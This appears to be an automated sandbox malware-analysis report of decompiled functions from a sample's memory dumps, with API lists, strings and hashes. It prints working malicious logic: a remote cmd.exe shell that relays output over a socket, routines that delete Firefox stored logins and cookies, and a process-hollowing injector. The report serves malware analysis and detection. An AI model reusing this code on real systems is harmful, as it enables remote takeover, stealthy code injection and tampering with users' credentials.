						E004020EC(_t98, _t156, "cmd.exe", CreateProcessA(_t98, E00401F95(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc18, 0x46dcd4),  &_a4);
						_push(0x93);
						_t100 = 0x46dc60;
						_t147 = E00404AA4(_t98, 0x46dc60, "cmd.exe", CreateProcessA(_t98, E00401F95(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc18, 0x46dcd4));
						Sleep(0x12c);
						_t168 =  *0x46bae2 - _t98; // 0x0
						if(_t168 == 0) {
							goto L26;
						}
						_t139 = 0x46c2d0;
						do {
							goto L12;
							L21:
							_t38 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
							_t100 = _t139;
							 *0x46bae3 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
							if(E00402489() == 0) {
								_v8 = _t98;
							} else {
								E00405A02(_t98, _t139, _t139, "\n");
								E00401FAD( &_v40, _t139);
								_t52 = E00402489();
								WriteFile( *0x46dccc, E00401F95(_t139), _t52,  &_v8, _t98);
								_t100 = _t139;
								E00405A0B(_t98, _t139, 0x45f6bc);
							}
							Sleep(0x64);
							_t175 =  *0x46bae3 - _t98; // 0x0
						} while (_t175 != 0);
						TerminateProcess(0x46dcd4->hProcess, _t98);
						CloseHandle( *0x46dcd8);
						CloseHandle( *0x46dcd4);
						goto L26;
					}
				}
			}

0x004055f3
0x004055f7
0x004055f9
0x004055fb
0x00405603
0x0040560b
0x00405612
0x00405618
0x0040561e
0x00405626
0x00405630
0x00405635
0x0040563c
0x00405641
0x0040561e
0x0040564d
0x00405655
0x0040565b
0x00405661
0x00405668
0x00405672
0x00405679
0x0040567e
0x00405661
0x0040567f
0x00405682
0x00405687
0x0040568c
0x0040568f
0x00405695
0x0040580b
0x0040580f
0x0040581c
0x00405825
0x004058c7
0x004058d1
0x004058d6
0x004058e2
0x00000000
0x004058e2
0x0040582b
0x0040582e
0x00405835
0x00405845
0x0040584e
0x004058b9
0x004058ba
0x004058c0
0x00000000
0x004058c0
0x00405853
0x00405888
0x0040588c
0x00405891
0x00405894
0x00405896
0x00405899
0x0040589a
0x0040589e
0x004058b2
0x004058b4
0x00000000
0x004058b4
0x00405862
0x00405867
0x0040586a
0x0040586c
0x00000000
0x00000000
0x00405872
0x0040587d
0x00405880
0x00405882
0x00405883
0x00000000
0x0040569b
0x0040569b
0x004056a2
0x004056a7
0x004056a9
0x00405982
0x00405987
0x00405992
0x0040599e
0x004059a4
0x004059aa
0x004059ac
0x004059af
0x004059b7
0x004059c4
0x004059c4
0x004056c2
0x004056ce
0x004056ea
0x004056f4
0x004056fe
0x00405708
0x00000000
0x00405724
0x00405726
0x0040572f
0x00405737
0x0040573f
0x00405749
0x0040575e
0x00405763
0x00405769
0x0040576e
0x00405773
0x0040579c
0x004057a3
0x004057ad
0x004057b4
0x004057c3
0x004057c4
0x004057c5
0x004057c6
0x004057ce
0x004057d3
0x004057dc
0x004057e1
0x004057e6
0x004057f2
0x004057f4
0x004057fa
0x00405800
0x00000000
0x00000000
0x00405806
0x0040580b
0x00000000
0x004058e4
0x004058ef
0x004058f2
0x004058f4
0x00405900
0x00405946
0x00405902
0x00405909
0x00405912
0x0040591e
0x00405932
0x0040593d
0x0040593f
0x0040593f
0x0040594b
0x00405951
0x00405951
0x00405964
0x00405970
0x0040597c
0x00000000
0x0040597c
0x00405708

APIs

__Init_thread_footer.LIBCMT ref: 0040563C

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

__Init_thread_footer.LIBCMT ref: 00405679
CreatePipe.KERNEL32(0046DCE4,0046DCCC,0046DC08,00000000,0045F6D4,00000000), ref: 00405704
CreatePipe.KERNEL32(0046DCD0,0046DCEC,0046DC08,00000000), ref: 0040571A
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0046DC18,0046DCD4), ref: 0040578D
Sleep.KERNEL32(0000012C,00000093,?), ref: 004057F4
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040581C
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405845

Part of subcall function 0042F49E: __onexit.LIBCMT ref: 0042F4A4

WriteFile.KERNEL32(00000000,00000000,?,00000000,0046C2D0,0045F6D8,00000062,0045F6BC), ref: 00405932
Sleep.KERNEL32(00000064,00000062,0045F6BC), ref: 0040594B
TerminateProcess.KERNEL32(00000000), ref: 00405964
CloseHandle.KERNEL32 ref: 00405970
CloseHandle.KERNEL32 ref: 0040597C
CloseHandle.KERNEL32 ref: 00405992
CloseHandle.KERNEL32 ref: 0040599E

Strings

cmd.exe, xrefs: 0040569B
SystemDrive, xrefs: 004056AF

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: SystemDrive$cmd.exe
API String ID: 2994406822-3633465311
Opcode ID: e84c41bf3866c36445e5e5f8050936f23962f768152f0ad89c41c60dad4bb5f6
Instruction ID: 55ed603c712564892f9c2332be2a793e9955a409e8b955cd36c8b06ecb557e64
Opcode Fuzzy Hash: e84c41bf3866c36445e5e5f8050936f23962f768152f0ad89c41c60dad4bb5f6
Instruction Fuzzy Hash: E591D671F00208ABCB05BB659D4696F3A69EB44304B10407FF905B72E2EBF84D05DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A012, Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040A012(void* __ebx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				struct _WIN32_FIND_DATAA _v468;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t58;
				signed int _t59;
				signed int _t73;
				signed int _t75;
				char* _t108;
				signed int _t109;
				char* _t129;
				void* _t130;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t137;

				_t142 = __eflags;
				_t134 = __edi;
				_t89 = __ebx;
				E004020D5(__ebx,  &_v100);
				E004020D5(__ebx,  &_v76);
				E004020D5(__ebx,  &_v28);
				_t45 = E00402084(_t89,  &_v124, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				E00401FD1( &_v28, _t46, _t135, E004075C2(_t89,  &_v52, E0043988A(_t89, __eflags, "UserProfile"), _t134, _t142, _t45));
				E00401FC7();
				E00401FC7();
				_t128 =  &_v28;
				_t136 = FindFirstFileA(E00401F95(E00407558( &_v124,  &_v28, _t142, "*")),  &_v468);
				E00401FC7();
				_t143 = _t136 - 0xffffffff;
				if(_t136 != 0xffffffff) {
					while(1) {
						L15:
						__eflags = FindNextFileA(_t136,  &_v468);
						if(__eflags == 0) {
							break;
						}
						__eflags = _v468.dwFileAttributes & 0x00000010;
						if((_v468.dwFileAttributes & 0x00000010) == 0) {
							continue;
						}
						_t108 =  &(_v468.cFileName);
						__eflags =  *_t108 - 0x2e;
						if( *_t108 != 0x2e) {
							L5:
							_t129 =  &(_v468.cFileName);
							_t109 = 0;
							__eflags = 0;
							while(1) {
								_t58 =  *(_t129 + _t109) & 0x000000ff;
								_t130 = "..";
								__eflags = _t58 -  *((intOrPtr*)(_t130 + _t109));
								_t128 =  &(_v468.cFileName);
								if(_t58 !=  *((intOrPtr*)(_t130 + _t109))) {
									break;
								}
								_t109 = _t109 + 1;
								__eflags = _t109 - 3;
								if(_t109 != 3) {
									continue;
								}
								_t59 = 0;
								L10:
								__eflags = _t59;
								if(__eflags != 0) {
									E00401FD1( &_v100, _t61, _t136, E00405343(_t89,  &_v52, E00407558( &_v148,  &_v28, __eflags,  &(_v468.cFileName)), _t134, __eflags, "\\logins.json"));
									E00401FC7();
									E00401FC7();
									_t128 = E00407558( &_v52,  &_v28, __eflags,  &(_v468.cFileName));
									E00401FD1( &_v76, _t67, _t136, E00405343(_t89,  &_v148, _t67, _t134, __eflags, "\\key3.db"));
									E00401FC7();
									E00401FC7();
									_t73 = DeleteFileA(E00401F95( &_v100));
									__eflags = _t73;
									if(_t73 == 0) {
										GetLastError();
									}
									_t75 = DeleteFileA(E00401F95( &_v76));
									__eflags = _t75;
									if(_t75 == 0) {
										GetLastError();
									}
								}
								goto L15;
							}
							asm("sbb eax, eax");
							_t59 = _t58 | 0x00000001;
							__eflags = _t59;
							goto L10;
						}
						__eflags =  *(_t108 + 1) & 0x000000ff;
						if(( *(_t108 + 1) & 0x000000ff) == 0) {
							continue;
						}
						goto L5;
					}
					E00402084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins Cleared!]");
					E0040A6EF(_t89, _t128, __eflags);
					FindClose(_t136);
					goto L17;
				} else {
					FindClose(_t136);
					E00402084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins not found]");
					E0040A6EF(_t89,  &_v28, _t143);
					L17:
					E00401FC7();
					E00401FC7();
					E00401FC7();
					return 1;
				}
			}

0x0040a012
0x0040a012
0x0040a012
0x0040a01f
0x0040a027
0x0040a02f
0x0040a03c
0x0040a05c
0x0040a064
0x0040a06c
0x0040a07d
0x0040a09a
0x0040a09c
0x0040a0a1
0x0040a0a4
0x0040a1da
0x0040a1da
0x0040a1e8
0x0040a1ea
0x00000000
0x00000000
0x0040a0cd
0x0040a0d4
0x00000000
0x00000000
0x0040a0da
0x0040a0e0
0x0040a0e3
0x0040a0f1
0x0040a0f1
0x0040a0f7
0x0040a0f7
0x0040a0f9
0x0040a0f9
0x0040a0fd
0x0040a102
0x0040a105
0x0040a10b
0x00000000
0x00000000
0x0040a10d
0x0040a10e
0x0040a111
0x00000000
0x00000000
0x0040a113
0x0040a11c
0x0040a11c
0x0040a11e
0x0040a14e
0x0040a156
0x0040a161
0x0040a17e
0x0040a190
0x0040a19b
0x0040a1a3
0x0040a1b1
0x0040a1b7
0x0040a1b9
0x0040a1bb
0x0040a1bb
0x0040a1ca
0x0040a1d0
0x0040a1d2
0x0040a1d4
0x0040a1d4
0x0040a1d2
0x00000000
0x0040a11e
0x0040a117
0x0040a119
0x0040a119
0x00000000
0x0040a119
0x0040a0e9
0x0040a0eb
0x00000000
0x00000000
0x00000000
0x0040a0eb
0x0040a1fa
0x0040a1ff
0x0040a208
0x00000000
0x0040a0aa
0x0040a0ab
0x0040a0bb
0x0040a0c0
0x0040a20e
0x0040a211
0x0040a219
0x0040a221
0x0040a22c
0x0040a22c

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A091
FindClose.KERNEL32(00000000), ref: 0040A0AB
FindNextFileA.KERNEL32(00000000,?), ref: 0040A1E2
FindClose.KERNEL32(00000000), ref: 0040A208

Strings

\key3.db, xrefs: 0040A16C
UserProfile, xrefs: 0040A042
[Firefox StoredLogins not found], xrefs: 0040A0B6
\logins.json, xrefs: 0040A12A
[Firefox StoredLogins Cleared!], xrefs: 0040A1F5
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040A034

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: 5d0491ca9cae89bc5104faea7b268233d26295a2c7dd8e05c1aacd9efcab3538
Instruction ID: f2c277aebdcb09342038ebf6bf1e841689b7d3b7dff34d34010c96f776921475
Opcode Fuzzy Hash: 5d0491ca9cae89bc5104faea7b268233d26295a2c7dd8e05c1aacd9efcab3538
Instruction Fuzzy Hash: B451943091025A5BCB14FB71DD569EEB774AF11305F4001BFF806B60E2EF785A89CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A22D, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 143
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040A22D(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				struct _WIN32_FIND_DATAA _v444;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t35;
				signed int _t56;
				signed int _t57;
				long _t68;
				char* _t92;
				signed int _t93;
				void* _t102;
				char* _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;

				_t116 = __eflags;
				_t108 = __edi;
				E004020D5(0,  &_v52);
				E004020D5(0,  &_v28);
				_t35 = E00402084(0,  &_v100, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				E00401FD1( &_v28, _t36, _t109, E004075C2(0,  &_v76, E0043988A(0, __eflags, "UserProfile"), _t108, _t116, _t35));
				E00401FC7();
				E00401FC7();
				_t104 =  &_v28;
				_t110 = FindFirstFileA(E00401F95(E00407558( &_v100,  &_v28, _t116, "*")),  &_v444);
				E00401FC7();
				_t117 = _t110 - 0xffffffff;
				if(_t110 != 0xffffffff) {
					__eflags = FindNextFileA(_t110,  &_v444);
					if(__eflags == 0) {
						L17:
						E00402084(0, _t111 - 0x18, "\n[Firefox Cookies not found]");
						E0040A6EF(0, _t104, __eflags);
						FindClose(_t110);
						goto L18;
					} else {
						__eflags = 0;
						do {
							__eflags = _v444.dwFileAttributes & 0x00000010;
							if((_v444.dwFileAttributes & 0x00000010) == 0) {
								goto L16;
							} else {
								_t92 =  &(_v444.cFileName);
								__eflags =  *_t92 - 0x2e;
								if( *_t92 != 0x2e) {
									L8:
									_t105 =  &(_v444.cFileName);
									_t93 = 0;
									while(1) {
										_t56 =  *(_t105 + _t93) & 0x000000ff;
										_t106 = "..";
										__eflags = _t56 -  *((intOrPtr*)(_t106 + _t93));
										_t104 =  &(_v444.cFileName);
										if(_t56 !=  *((intOrPtr*)(_t106 + _t93))) {
											break;
										}
										_t93 = _t93 + 1;
										__eflags = _t93 - 3;
										if(_t93 != 3) {
											continue;
										} else {
											_t57 = 0;
										}
										L13:
										__eflags = _t57;
										if(__eflags == 0) {
											goto L16;
										} else {
											_t104 = E00407558( &_v124,  &_v28, __eflags,  &(_v444.cFileName));
											E00401FD1( &_v52, _t59, _t110, E00405343(0,  &_v76, _t59, _t108, __eflags, "\\cookies.sqlite"));
											E00401FC7();
											E00401FC7();
											__eflags = DeleteFileA(E00401F95( &_v52));
											if(__eflags != 0) {
												_t102 = _t111 - 0x18;
												_push("\n[Firefox cookies found, cleared!]");
												goto L2;
											} else {
												_t68 = GetLastError();
												__eflags = _t68 != 0;
												if(_t68 != 0) {
													FindClose(_t110);
												} else {
													goto L16;
												}
											}
										}
										goto L19;
									}
									asm("sbb eax, eax");
									_t57 = _t56 | 0x00000001;
									__eflags = _t57;
									goto L13;
								} else {
									__eflags =  *(_t92 + 1) & 0x000000ff;
									if(( *(_t92 + 1) & 0x000000ff) == 0) {
										goto L16;
									} else {
										goto L8;
									}
								}
							}
							goto L19;
							L16:
							__eflags = FindNextFileA(_t110,  &_v444);
						} while (__eflags != 0);
						goto L17;
					}
				} else {
					FindClose(_t110);
					_t102 = _t111 - 0x18;
					_push("\n[Firefox Cookies not found]");
					L2:
					E00402084(0, _t102);
					E0040A6EF(0, _t104, _t117);
					L18:
				}
				L19:
				E00401FC7();
				E00401FC7();
				return 1;
			}

0x0040a22d
0x0040a22d
0x0040a23b
0x0040a243
0x0040a250
0x0040a270
0x0040a278
0x0040a280
0x0040a291
0x0040a2ae
0x0040a2b0
0x0040a2b5
0x0040a2b8
0x0040a2eb
0x0040a2ed
0x0040a3b9
0x0040a3c3
0x0040a3c8
0x0040a3d1
0x00000000
0x0040a2f3
0x0040a2f3
0x0040a2f5
0x0040a2f5
0x0040a2fc
0x00000000
0x0040a302
0x0040a302
0x0040a308
0x0040a30b
0x0040a319
0x0040a319
0x0040a31f
0x0040a321
0x0040a321
0x0040a325
0x0040a32a
0x0040a32d
0x0040a333
0x00000000
0x00000000
0x0040a335
0x0040a336
0x0040a339
0x00000000
0x0040a33b
0x0040a33b
0x0040a33b
0x0040a344
0x0040a344
0x0040a346
0x00000000
0x0040a348
0x0040a360
0x0040a36f
0x0040a377
0x0040a37f
0x0040a393
0x0040a395
0x0040a3fd
0x0040a3ff
0x00000000
0x0040a397
0x0040a397
0x0040a39e
0x0040a3a1
0x0040a3f2
0x00000000
0x00000000
0x00000000
0x0040a3a1
0x0040a395
0x00000000
0x0040a346
0x0040a33f
0x0040a341
0x0040a341
0x00000000
0x0040a30d
0x0040a311
0x0040a313
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a313
0x0040a30b
0x00000000
0x0040a3a3
0x0040a3b1
0x0040a3b1
0x00000000
0x0040a2f5
0x0040a2ba
0x0040a2bb
0x0040a2c4
0x0040a2c6
0x0040a2cb
0x0040a2cb
0x0040a2d0
0x0040a3d7
0x0040a3d7
0x0040a3d9
0x0040a3dc
0x0040a3e4
0x0040a3f0

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A2A5
FindClose.KERNEL32(00000000), ref: 0040A2BB
FindNextFileA.KERNEL32(00000000,?), ref: 0040A2E5
DeleteFileA.KERNEL32(00000000,00000000), ref: 0040A38D
GetLastError.KERNEL32 ref: 0040A397
FindNextFileA.KERNEL32(00000000,00000010), ref: 0040A3AB
FindClose.KERNEL32(00000000), ref: 0040A3D1
FindClose.KERNEL32(00000000), ref: 0040A3F2

Strings

\cookies.sqlite, xrefs: 0040A34E
UserProfile, xrefs: 0040A256
[Firefox cookies found, cleared!], xrefs: 0040A3FF
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040A248
[Firefox Cookies not found], xrefs: 0040A2C6, 0040A3BE

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Find$File$Close$Next$DeleteErrorFirstLast
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 532992503-432212279
Opcode ID: 19b94a7eb9c72e0da80e9ae67ef59f4eca6279e3ef411f6a90b8712bb590b6c0
Instruction ID: 2e8bce256a7dd72f22d157e061cccd6386a79eba79b63e076e2be11f32c05444
Opcode Fuzzy Hash: 19b94a7eb9c72e0da80e9ae67ef59f4eca6279e3ef411f6a90b8712bb590b6c0
Instruction Fuzzy Hash: 5441B2309003195BCB14FBA5DC569EE7778AF11305F40017FF806B61D2EF385A99CA9A

Uniqueness

Uniqueness Score: -1.00%

Function 105A4F99, Relevance: 19.7, APIs: 13, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E105A4F99(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4) {
				void _v8;
				signed int _v12;
				void* _v16;
				CONTEXT* _v20;
				WCHAR* _v24;
				struct _STARTUPINFOW _v92;
				void* __edi;
				void* _t58;
				void* _t72;
				void* _t73;
				int _t83;
				intOrPtr* _t95;
				void* _t98;
				signed int _t102;
				void* _t104;
				void* _t106;
				intOrPtr* _t109;
				CONTEXT* _t110;
				intOrPtr* _t111;
				void* _t113;
				CONTEXT* _t114;
				struct _PROCESS_INFORMATION* _t116;

				_v8 = _v8 & 0x00000000;
				_v16 = __edx;
				_v24 = __ecx;
				if( *__edx == 0x5a4d) {
					_t95 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
					if( *_t95 == 0x4550) {
						_push(_t106);
						E105C2D6E(_t106,  &_v92, 0, 0x44);
						_t116 = _a4;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						if(CreateProcessW(0, _v24, 0, 0, 0, 4, 0, 0,  &_v92, _t116) == 0) {
							L21:
							_t58 = 0;
							L22:
							L23:
							return _t58;
						}
						_t109 =  *0x4532ac;
						 *_t109(_v92.hStdInput);
						 *_t109(_v92.hStdOutput);
						 *_t109(_v92.hStdError);
						_t110 = VirtualAlloc(0, 4, 0x1000, 4);
						_v20 = _t110;
						_t110->ContextFlags = 0x10007;
						_t14 =  &(_t116->hThread); // 0xffffdcf2
						if(GetThreadContext( *_t14, _t110) == 0 || ReadProcessMemory(_t116->hProcess, _t110->Ebx + 8,  &_v8, 4, 0) == 0) {
							L20:
							TerminateProcess(_t116->hProcess, 0);
							_t111 =  *0x4532ac;
							 *_t111(_t116->hProcess);
							_t50 =  &(_t116->hThread); // 0xffffdcf2
							 *_t111( *_t50);
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							goto L21;
						} else {
							_t72 = _v8;
							if(_t72 ==  *(_t95 + 0x34)) {
								NtUnmapViewOfSection(_t116->hProcess, _t72);
							}
							_t73 = VirtualAllocEx(_t116->hProcess,  *(_t95 + 0x34),  *(_t95 + 0x50), 0x3000, 0x40);
							_v24 = _t73;
							if(_t73 == 0) {
								goto L20;
							} else {
								_t113 = _v16;
								if(WriteProcessMemory(_t116->hProcess, _t73, _t113,  *(_t95 + 0x54), 0) == 0) {
									goto L20;
								}
								_v12 = _v12 & 0x00000000;
								if(0 >=  *(_t95 + 6)) {
									L14:
									_t98 = _t95 + 0x34;
									_t114 = _v20;
									if(_v8 ==  *_t98) {
										L17:
										_t114->Eax =  *((intOrPtr*)(_t95 + 0x28)) + _v24;
										_t48 =  &(_t116->hThread); // 0xffffdcf2
										if(SetThreadContext( *_t48, _t114) == 0) {
											goto L20;
										}
										_t49 =  &(_t116->hThread); // 0xffffdcf2
										if(ResumeThread( *_t49) == 0xffffffff) {
											goto L20;
										}
										_t58 = 1;
										goto L22;
									}
									_t83 = WriteProcessMemory(_t116->hProcess, _t114->Ebx + 8, _t98, 4, 0);
									if(_t83 != 0) {
										goto L17;
									}
									TerminateProcess(_t116->hProcess, _t83);
									goto L21;
								}
								_t104 = 0;
								_v16 = 0;
								do {
									_t28 = _t113 + 0x3c; // 0x83ffc983
									WriteProcessMemory( *_t116,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x104)) + _v24,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x10c)) + _t113,  *( *_t28 + _t104 + _t113 + 0x108), 0);
									_t102 = _v12 + 1;
									_t104 = _v16 + 0x28;
									_v12 = _t102;
									_v16 = _t104;
								} while (_t102 < ( *(_t95 + 6) & 0x0000ffff));
								goto L14;
							}
						}
					}
					_t58 = 0;
					goto L23;
				}
				return 0;
			}

0x105a4f9f
0x105a4fa8
0x105a4fab
0x105a4fb1
0x105a4fbe
0x105a4fc6
0x105a4fd0
0x105a4fd9
0x105a4fde
0x105a4fe8
0x105a4fea
0x105a4feb
0x105a4fec
0x105a5006
0x105a5190
0x105a5190
0x105a5192
0x105a5194
0x00000000
0x105a5194
0x105a500f
0x105a5015
0x105a501a
0x105a501f
0x105a5032
0x105a5035
0x105a5038
0x105a503e
0x105a5049
0x105a516f
0x105a5173
0x105a517b
0x105a5181
0x105a5183
0x105a5186
0x105a518c
0x105a518d
0x105a518e
0x105a518f
0x00000000
0x105a5071
0x105a5071
0x105a5077
0x105a507c
0x105a507c
0x105a5091
0x105a5097
0x105a509c
0x00000000
0x105a50a2
0x105a50a2
0x105a50b6
0x00000000
0x00000000
0x105a50bc
0x105a50c6
0x105a5110
0x105a5113
0x105a5116
0x105a511b
0x105a5143
0x105a514a
0x105a5150
0x105a515b
0x00000000
0x00000000
0x105a515d
0x105a5169
0x00000000
0x00000000
0x105a516b
0x00000000
0x105a516b
0x105a512e
0x105a5136
0x00000000
0x00000000
0x105a513b
0x00000000
0x105a513b
0x105a50c8
0x105a50ca
0x105a50cd
0x105a50cd
0x105a50f2
0x105a50fe
0x105a5103
0x105a5106
0x105a5109
0x105a510c
0x00000000
0x105a50cd
0x105a509c
0x105a5049
0x105a4fc8
0x00000000
0x105a4fc8
0x00000000

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2469e3083292f701c311b878a3b14c99dabb4edf3a4aaae222874b4e6f5cfb23
Instruction ID: d7d339fe152a989d42620b9c5b2f5e2415568cd0140fff9f840bd936dff26f2e
Opcode Fuzzy Hash: 2469e3083292f701c311b878a3b14c99dabb4edf3a4aaae222874b4e6f5cfb23
Instruction Fuzzy Hash: 0F515570A00605FFEB108FA5CC45FAEBBB9EF44746F204468F684EA2A5D771E910CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00442C8E, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370
timeCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00442C8E(void* __ebx, void* __edi, signed int __esi, void* __eflags, char _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				intOrPtr _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				signed int _t167;
				intOrPtr* _t168;
				void* _t169;
				intOrPtr _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t178 = __esi;
				_t171 = __edi;
				_t65 = E004428CD();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E0044292B( &_v8) != 0 || E004428D3( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0043698A();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E004428CD();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E0044292B( &_v52);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E0043698A();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x46a00c; // 0xee31ea10
						_v100 = _t74 ^ _t192;
						 *0x46a344 =  *0x46a344 | 0xffffffff;
						 *0x46a338 =  *0x46a338 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t139 = "TZ";
						_t172 = 0;
						 *0x46b748 = 0;
						_t78 = E00439895(__eflags,  &_v360,  &_v356, 0x100, "TZ");
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E0043F98C(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E00439895(__eflags,  &_v280, _t184, _v276, _t139);
									__eflags = _t85;
									if(_t85 == 0) {
										E004401F5(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L72;
									}
								} else {
									_push(0);
									L72:
									E004401F5();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L80:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L80;
							} else {
								_push(_t172);
								E00442C8E(_t139, _t172, _t183, __eflags);
							}
						}
						E004401F5(_t183);
						__eflags = _v16 ^ _t192;
						return E0042FD1B(_v16 ^ _t192);
					} else {
						_t89 = E004428D3( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E004428FF( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E004401F5( *0x46b740);
								 *0x46b740 = 0;
								 *_t194 = 0x46b750;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x46b750 * 0x3c;
									_t167 =  *0x46b7a4; // 0x0
									_push(_t171);
									 *0x46b748 = 1;
									_v12 = _t150;
									__eflags =  *0x46b796; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t167 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x46b7ea; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x46b7f8; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t167) * 0x3c;
										}
									}
									_t176 = E0043F55B(0, _t167);
									_t99 = WideCharToMultiByte(_t176, 0, 0x46b754, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
